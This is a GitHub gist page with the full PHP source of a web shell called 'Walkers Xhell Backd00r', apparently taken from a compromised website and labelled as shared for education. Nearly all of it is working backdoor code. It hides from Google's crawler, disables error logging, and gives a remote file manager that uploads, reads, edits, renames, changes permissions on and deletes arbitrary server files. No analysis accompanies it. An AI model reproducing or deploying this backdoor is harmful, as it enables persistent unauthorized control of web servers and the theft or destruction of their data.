Last active
December 27, 2015 12:45
-
-
Save wingsryder/370ef09665dcd54e610e to your computer and use it in GitHub Desktop.
walker-xhell.php
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* This script has been taken from one of hacked website by walker 404 / Arjasari Cyber Team. This has been shared for education purpose only. | |
* | |
*/ | |
<?php | |
/** | |
$auth_pass = "1b20369c2cf27cd1fbc0ed634759f05e"; // password : umaruchan | |
$color = "cyan"; | |
$default_action = 'FilesMan'; | |
@define('SELF_PATH', __FILE__); | |
@setcookie("inject","active",time() +3600*24*7); | |
if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) { | |
header('HTTP/1.0 404 Not Found'); | |
exit; | |
} | |
@session_start(); | |
@error_reporting(0); | |
@ini_set('error_log',NULL); | |
@ini_set('log_errors',0); | |
@ini_set('max_execution_time',0); | |
@ini_set('output_buffering',0); | |
@ini_set('display_errors', 0); | |
@set_time_limit(0); | |
@set_magic_quotes_runtime(0); | |
@define('VERSION', '2.1'); | |
if( get_magic_quotes_gpc() ) { | |
function stripslashes_array($array) { | |
return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array); | |
} | |
$_POST = stripslashes_array($_POST); | |
} | |
function printLogin() { | |
?> | |
<title>***********</title> | |
<p><body style="background-color:black"><center> | |
<br /><font color="red">Masukkan Password</font></p> | |
<style> | |
input { margin:0;background-color:#00ff00;border:3px solid #ff0000; } | |
</style> | |
<center> | |
<form method=post><input type=password name=pass></form></center> | |
<?php | |
exit; | |
} | |
if( !isset( $_SESSION[md5($_SERVER['HTTP_Host'])] )) | |
if( empty( $auth_pass ) || | |
( isset( $_POST['pass'] ) || ( md5($_POST['pass']) == $auth_pass ) ) ) | |
$_SESSION[md5($_SERVER['HTTP_Host'])] = true; | |
else | |
printLogin(); | |
set_time_limit(0); | |
error_reporting(0); | |
if(get_magic_quotes_gpc()){ | |
foreach($_POST as $key=>$value){ | |
$_POST[$key] = stripslashes($value); | |
} | |
} | |
echo '<!DOCTYPE HTML> | |
<HTML> | |
<HEAD> | |
<link href="" rel="stylesheet" type="text/css"> | |
<link rel="shortcut icon" href="http://www.olamayemen.com/Oy_Admin/themes/flat-bs3/img/16x16/hacker.png"> | |
<title>-[ Walkers Xhell Backd00r ]-</title> | |
<style> | |
body{ | |
font-family: "Racing Sans One", cursive; | |
background-color: #ffffff; | |
text-shadow:0px 0px 1px #ffffff; | |
} | |
#content tr:hover{ | |
background-color: #00ff00; | |
text-shadow:0px 0px 10px #fff; | |
} | |
#content .first{ | |
background-color: silver; | |
} | |
#content .first:hover{ | |
background-color: silver; | |
text-shadow:0px 0px 1px #ffffff; | |
} | |
table{ | |
border: 1px #ffffff dotted; | |
} | |
H1{ | |
font-family: "Rye", cursive; | |
} | |
a{ | |
color: #00ff00; | |
text-decoration: none; | |
} | |
a:hover{ | |
color: #ffffff; | |
text-shadow:0px 0px 10px #ffffff; | |
} | |
input,select,textarea{ | |
border: 1px #ffffff solid; | |
-moz-border-radius: 5px; | |
-webkit-border-radius:5px; | |
border-radius:5px; | |
} | |
</style> | |
</head> | |
<body> | |
<h1><center><font color="#ff0000">[#] Walkers Xhell Backd00r [#]</font></center></h1> | |
<br /> | |
<center><img src="http://ih0.redbubble.net/image.89215114.1590/sticker,375x360.u4.png" width="170"></center> | |
<table width="700" border="0" cellpadding="3" cellspacing="1" align="center"> | |
<tr><td>Jalur Saat Ini : '; | |
if(isset($_GET['path'])){ | |
$path = $_GET['path']; | |
}else{ | |
$path = getcwd(); | |
} | |
$path = str_replace('\\','/',$path); | |
$paths = explode('/',$path); | |
foreach($paths as $id=>$pat){ | |
if($pat == '' && $id == 0){ | |
$a = true; | |
echo '<a href="?path=/">/</a>'; | |
continue; | |
} | |
if($pat == '') continue; | |
echo '<a href="?path='; | |
for($i=0;$i<=$id;$i++){ | |
echo "$paths[$i]"; | |
if($i != $id) echo "/"; | |
} | |
echo '">'.$pat.'</a>/'; | |
} | |
echo '</td></tr><tr><td>'; | |
if(isset($_FILES['file'])){ | |
if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){ | |
echo '<center><font color="lime"> >>> File Upload Done ^_^</font></center><br />'; | |
}else{ | |
echo '<center><font color="red">File Upload Error ~_~.</font></center><br />'; | |
} | |
} | |
echo '<style>body {background:#000000} | |
input,submit {border:1px;solid lime;color:#009000}</style><form enctype="multipart/form-data" method="POST"> | |
Upload File : <input type="file" name="file" /> | |
<input type="submit" value="Hantam" /> | |
</form> | |
</td></tr>'; | |
if(isset($_GET['filesrc'])){ | |
echo "<tr><td>File Saat Ini : "; | |
echo $_GET['filesrc']; | |
echo '</tr></td></table><br />'; | |
echo('<pre>'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</pre>'); | |
}elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){ | |
echo '</table><br /><center>'.$_POST['path'].'<br /><br />'; | |
if($_POST['opt'] == 'chmod'){ | |
if(isset($_POST['perm'])){ | |
if(chmod($_POST['path'],$_POST['perm'])){ | |
echo '<font color="lime"> >>> Change Permission Done ^_^</font><br />'; | |
}else{ | |
echo '<font color="red">Change Permission Error.</font><br />'; | |
} | |
} | |
echo '<form method="POST"> Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" /> | |
<input type="hidden" name="path" value="'.$_POST['path'].'"> | |
<input type="hidden" name="opt" value="chmod"> | |
<input type="submit" value="Go" /> | |
</form>'; | |
}elseif($_POST['opt'] == 'rename'){ | |
if(isset($_POST['newname'])){ | |
if(rename($_POST['path'],$path.'/'.$_POST['newname'])){ | |
echo '<font color="lime"> >>> Change Name Done ^_^</font><br />'; | |
}else{ | |
echo '<font color="red">Change Name Error.</font><br />'; | |
} | |
$_POST['name'] = $_POST['newname']; | |
} | |
echo '<form method="POST"> | |
New Name : <input name="newname" type="text" size="20" value="'.$_POST['name'].'" /> | |
<input type="hidden" name="path" value="'.$_POST['path'].'"> | |
<input type="hidden" name="opt" value="rename"> | |
<input type="submit" value="Go" /> | |
</form>'; | |
}elseif($_POST['opt'] == 'edit'){ | |
if(isset($_POST['src'])){ | |
$fp = fopen($_POST['path'],'w'); | |
if(fwrite($fp,$_POST['src'])){ | |
echo '<font color="lime"> >>> Edit File Done ~_^.</font><br />'; | |
}else{ | |
echo '<font color="red">Edit File Error ~_~.</font><br />'; | |
} | |
fclose($fp); | |
} | |
echo '<form method="POST"> | |
<textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br /> | |
<input type="hidden" name="path" value="'.$_POST['path'].'"> | |
<input type="hidden" name="opt" value="edit"> | |
<input type="submit" value="Go" /> | |
</form>'; | |
} | |
echo '</center>'; | |
}else{ | |
echo '</table><br /><center>'; | |
if(isset($_GET['option']) && $_POST['opt'] == 'delete'){ | |
if($_POST['type'] == 'dir'){ | |
if(rmdir($_POST['path'])){ | |
echo '<font color="lime"> >>> Delete Dir Done ^_^</font><br />'; | |
}else{ | |
echo '<font color="red">Delete Dir Error.</font><br />'; | |
} | |
}elseif($_POST['type'] == 'file'){ | |
if(unlink($_POST['path'])){ | |
echo '<font color="lime"> >>> Delete File Done ^_^</font><br />'; | |
}else{ | |
echo '<font color="red">Delete File Error.</font><br />'; | |
} | |
} | |
} | |
echo '</center>'; | |
$scandir = scandir($path); | |
echo '<div id="content"><table width="700" border="0" cellpadding="3" cellspacing="1" align="center"> | |
<tr class="first"> | |
<td><center>-------------------------------</center></td></tr>'; | |
foreach($scandir as $dir){ | |
if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue; | |
echo "<tr> | |
<td>[ <a href=\"?path=$path/$dir\">$dir</a> ]</td> | |
<td><center>---</center></td> | |
<td><center>"; | |
if(is_writable("$path/$dir")) echo '<font color="lime">'; | |
elseif(!is_readable("$path/$dir")) echo '<font color="red">'; | |
echo perms("$path/$dir"); | |
if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo '</font>'; | |
echo "</center></td> | |
<td><center><form method=\"POST\" action=\"?option&path=$path\"> | |
<select name=\"opt\"> | |
<option value=\"\"></option> | |
<option value=\"delete\">Delete</option> | |
<option value=\"chmod\">Chmod</option> | |
</select> | |
<input type=\"hidden\" name=\"type\" value=\"dir\"> | |
<input type=\"hidden\" name=\"name\" value=\"$dir\"> | |
<input type=\"hidden\" name=\"path\" value=\"$path/$dir\"> | |
<input type=\"submit\" value=\"Go\" /> | |
</form></center></td> | |
</tr>"; | |
} | |
echo '<tr class="first"><td></td><td></td><td></td><td></td></tr>'; | |
foreach($scandir as $file){ | |
if(!is_file("$path/$file")) continue; | |
$size = filesize("$path/$file")/1024; | |
$size = round($size,3); | |
if($size >= 1024){ | |
$size = round($size/1024,2).' MB'; | |
}else{ | |
$size = $size.' KB'; | |
} | |
echo "<tr> | |
<td><a href=\"?filesrc=$path/$file&path=$path\">$file</a></td> | |
<td><center>(".$size.")</center></td> | |
<td><center>"; | |
if(is_writable("$path/$file")) echo '<font color="lime">'; | |
elseif(!is_readable("$path/$file")) echo '<font color="red">'; | |
echo perms("$path/$file"); | |
if(is_writable("$path/$file") || !is_readable("$path/$file")) echo '</font>'; | |
echo "</center></td> | |
<td><center><form method=\"POST\" action=\"?option&path=$path\"> | |
<select name=\"opt\"> | |
<option value=\"\"></option> | |
<option value=\"delete\">Delete</option> | |
<option value=\"chmod\">Chmod</option> | |
<option value=\"edit\">Edit</option> | |
</select> | |
<input type=\"hidden\" name=\"type\" value=\"file\"> | |
<input type=\"hidden\" name=\"name\" value=\"$file\"> | |
<input type=\"hidden\" name=\"path\" value=\"$path/$file\"> | |
<input type=\"submit\" value=\"Go\" /> | |
</form></center></td> | |
</tr>"; | |
} | |
echo '</table> | |
</div>'; | |
} | |
echo '<br /><center></center> | |
</BODY> | |
</HTML>'; | |
function perms($file){ | |
$perms = fileperms($file); | |
if (($perms & 0xC000) == 0xC000) { | |
// Socket | |
$info = 's'; | |
} elseif (($perms & 0xA000) == 0xA000) { | |
// Symbolic Link | |
$info = 'l'; | |
} elseif (($perms & 0x8000) == 0x8000) { | |
// Regular | |
$info = '-'; | |
} elseif (($perms & 0x6000) == 0x6000) { | |
// Block special | |
$info = 'b'; | |
} elseif (($perms & 0x4000) == 0x4000) { | |
// Directory | |
$info = 'd'; | |
} elseif (($perms & 0x2000) == 0x2000) { | |
// Character special | |
$info = 'c'; | |
} elseif (($perms & 0x1000) == 0x1000) { | |
// FIFO pipe | |
$info = 'p'; | |
} else { | |
// Unknown | |
$info = 'u'; | |
} | |
// Owner | |
$info .= (($perms & 0x0100) ? 'r' : '-'); | |
$info .= (($perms & 0x0080) ? 'w' : '-'); | |
$info .= (($perms & 0x0040) ? | |
(($perms & 0x0800) ? 's' : 'x' ) : | |
(($perms & 0x0800) ? 'S' : '-')); | |
// Group | |
$info .= (($perms & 0x0020) ? 'r' : '-'); | |
$info .= (($perms & 0x0010) ? 'w' : '-'); | |
$info .= (($perms & 0x0008) ? | |
(($perms & 0x0400) ? 's' : 'x' ) : | |
(($perms & 0x0400) ? 'S' : '-')); | |
// World | |
$info .= (($perms & 0x0004) ? 'r' : '-'); | |
$info .= (($perms & 0x0002) ? 'w' : '-'); | |
$info .= (($perms & 0x0001) ? | |
(($perms & 0x0200) ? 't' : 'x' ) : | |
(($perms & 0x0200) ? 'T' : '-')); | |
return $info; | |
} | |
**/ | |
?> | |
hidden |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment